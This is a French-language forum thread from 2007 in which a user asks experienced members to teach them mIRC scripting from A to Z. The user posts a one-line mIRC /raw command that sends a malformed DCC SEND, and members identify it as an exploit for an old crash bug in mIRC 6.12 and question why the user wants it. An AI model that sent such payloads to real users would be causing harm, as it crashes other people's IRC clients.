Cherche scripteur irc

dripp Messages postés 25 Date d'inscription vendredi 10 août 2007 Statut Membre Dernière intervention 27 août 2007 - 10 août 2007 à 17:04
 ennery - 26 août 2007 à 05:11
Bonjour
 
Je cherche un pro du scripting ou de l'irc pour m'apprendre
tout ce qu'il sait.
 
j'attend une reponse =)

21 réponses

dripp Messages postés 25 Date d'inscription vendredi 10 août 2007 Statut Membre Dernière intervention 27 août 2007
10 août 2007 à 17:09
j'ai des bases suffisantes je veux attaquer lourd =)
0
cs_wims Messages postés 2466 Date d'inscription vendredi 23 juillet 2004 Statut Membre Dernière intervention 1 août 2010 1
10 août 2007 à 17:18
Explique donc ce que tu veux attaquer, ce forum suffira amplement...
0
dripp Messages postés 25 Date d'inscription vendredi 10 août 2007 Statut Membre Dernière intervention 27 août 2007
10 août 2007 à 17:22
en faite je veux tout voir de A a Z ainsi que l'ircd il me faudrait quelqu'un dispo pour me rendre totalement independant. étudier également les dll de mirc etc ...
0
cs_wims Messages postés 2466 Date d'inscription vendredi 23 juillet 2004 Statut Membre Dernière intervention 1 août 2010 1
10 août 2007 à 17:36
C'est pas possible, tu n'apprends pas mirc de A a Z en claquant des doigts, faut s'entrainer afin de bien comprendre comment ça marche.
L'ircd c'est pareil, faut y allé progressivement...

J'pense pas que tu trouves qqun ici qui va te dire, ouais moi j'vais tout t'apprendre, rien que par le fait du manque de temps.
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
dripp Messages postés 25 Date d'inscription vendredi 10 août 2007 Statut Membre Dernière intervention 27 août 2007
10 août 2007 à 17:40
ben enfete jai deja attaqué le scripting 1 an faut juste je me remette sur pied
Et puis j'avais deja créé des ptits script a vendre enfin bon si sa interesse quelqu un ..
0
cs_wims Messages postés 2466 Date d'inscription vendredi 23 juillet 2004 Statut Membre Dernière intervention 1 août 2010 1
10 août 2007 à 18:34
A vendre mdr ? dis nous juste ce que tu veux faire et on t'aidera mais personne va t'apprendre mIRC entier ainsi que le fonctionnement d'un ircd
0
RCA ArKanis Messages postés 1287 Date d'inscription mercredi 21 avril 2004 Statut Membre Dernière intervention 21 février 2009
11 août 2007 à 00:13
De même que Wims l'a dit, je ne pense pas que quelqu'un soit prêt à t'aider comme ça ...
Donner des conseils, tester rapidement tes codes, ... ça OK y'a aucun problème, mais tout te dire, tu devrais quand même comprendre avec ton "année d'expérience" que c'est vraiment impossible ...

à mon avis, la majorité d'entre nous sont à la limite ou sont autodidactes. Il faudrait que tu en fasses autant, c'est comme ça qu'on apprend le mieux (parce que tu réfléchiras beaucoup plus).
0
dripp Messages postés 25 Date d'inscription vendredi 10 août 2007 Statut Membre Dernière intervention 27 août 2007
13 août 2007 à 11:04
ok alors décoder sa :
raw privmsg $$1 : $+ $chr(1) $+ DCC SEND " $+ $str($rand(a,z) $+ $chr(32), 165) $+ $longip(127.0.0.1) $rand(113,9999) $+ $chr(1)

j ai jamais rien compris au raw et encore moin a celui ci qui a un but mauvais :O
0
dripp Messages postés 25 Date d'inscription vendredi 10 août 2007 Statut Membre Dernière intervention 27 août 2007
13 août 2007 à 11:05
svp =) ( failli oublier :p)
0
RCA ArKanis Messages postés 1287 Date d'inscription mercredi 21 avril 2004 Statut Membre Dernière intervention 21 février 2009
13 août 2007 à 12:43
c'est pas une exploitation d'une faille d'une vieille version de mIRC ?
y'avait un truc de ce genre qui faisait bugguer mIRC
0
dripp Messages postés 25 Date d'inscription vendredi 10 août 2007 Statut Membre Dernière intervention 27 août 2007
13 août 2007 à 13:24
oui la version 6.12
0
cs_wims Messages postés 2466 Date d'inscription vendredi 23 juillet 2004 Statut Membre Dernière intervention 1 août 2010 1
13 août 2007 à 19:02
Et (ya rien a décoder en plus, tout est très clair)
0
dripp Messages postés 25 Date d'inscription vendredi 10 août 2007 Statut Membre Dernière intervention 27 août 2007
13 août 2007 à 19:49
mais c'est quel raw sa ? je my connais pas beaucoup en raw
et toutes les variables ?
0
cs_ISoKa Messages postés 435 Date d'inscription jeudi 27 avril 2006 Statut Membre Dernière intervention 17 octobre 2008
13 août 2007 à 20:17
en gros tu cherche la raw de l'ancienne faille... et ca serai pour quoi faire ? :)

ISoKa
0
RCA ArKanis Messages postés 1287 Date d'inscription mercredi 21 avril 2004 Statut Membre Dernière intervention 21 février 2009
13 août 2007 à 20:47
mais non, c'est pas une raw, c'est la commande /raw qui envoie directement une information au serveur
cf l'aide sur /raw

cette commande exploite une faille, y'a rien à comprendre de plus
0
uaip Messages postés 1466 Date d'inscription mardi 20 février 2007 Statut Membre Dernière intervention 7 février 2011
18 août 2007 à 18:27
je rentre de vacances et je vois ca :)
pour en revenir a ton pb du départ -> tout apprendre du mirc <- c'est tres simple, tu imprimes l'aide entiere (/help) et tu la bouquines tous les soirs avant de t'endormir. Dans ce cas la tu n'as besoin de personne.
0
cs_wims Messages postés 2466 Date d'inscription vendredi 23 juillet 2004 Statut Membre Dernière intervention 1 août 2010 1
18 août 2007 à 18:51
Sauf que dans ce cas là, tu n'apprend rien du tout mais alors strictement rien du tout...
0
uaip Messages postés 1466 Date d'inscription mardi 20 février 2007 Statut Membre Dernière intervention 7 février 2011
18 août 2007 à 20:01
alors dois-je considérer que je n'ai rien appris ?
si je lui dis ca, c'est pask c'est une "expérience" personnelle, j'ai toujours su me débrouiller tout seul (de tps en tps je demande de l'aide sur epiknet quand vraiment je coince) et le résultat est plutot convaincant : en quelques mois j'ai un peu touché a tout (excepté, comme dirait Arkanis, les binvars et un peu le socket). bref, moi je lui conseille ca, et je ne vois pas la différence entre lire une doc ou lire les phrases d'un gars sur irc... enfin bref, bonne soirée :)
0
cs_wims Messages postés 2466 Date d'inscription vendredi 23 juillet 2004 Statut Membre Dernière intervention 1 août 2010 1
18 août 2007 à 20:47
Je voulais dire par là, que tu n'apprendra rien du tout en apprennant l'aide par coeur, tu apprend avec l'experience, a force de cherché/bidouillé etc..

Tu auras beau connaitre l'aide de mirc sur le bout des doigts, a la moindre erreur, tu vas pas savoir quoi faire si tu n'as pas déja essayé de débug un code :)
Et je te dis ça parce que j'en ai aidé des personnes, leur dire d'allé lire l'aide ne change strictement rien, le type n'apprend rien, mieux vos lui montrez un code et lui expliqué :)
0
uaip Messages postés 1466 Date d'inscription mardi 20 février 2007 Statut Membre Dernière intervention 7 février 2011
19 août 2007 à 13:53
je suis entierement d'accord avec toi : la meilleure facon d'apprendre c'est d'user la théorie (bien sur) mais également la pratique.
mais, je cite l'auteur du post :
"Je cherche un pro du scripting ou de l'irc pour m'apprendre tout ce qu'il sait."
-> si le gars est pro, il connait tout
-> et comme il veut "tout" savoir, alors autant lire l'aide, c'est pareil que de lire ce qu'écrit le gars.

Maintenant, pour etre franc, chercher un pro pour qu'il apprenne tout, ce n'est pas non plus la meilleure solution

Bref, je m'arrete la sinon ca va tourner en rond, et pour répondre a dripp, comme l'a dit wims, la meilleure solution est d'apprendre petit a petit avec l'expérience.
/me quitte la discussion.
0
Rejoignez-nous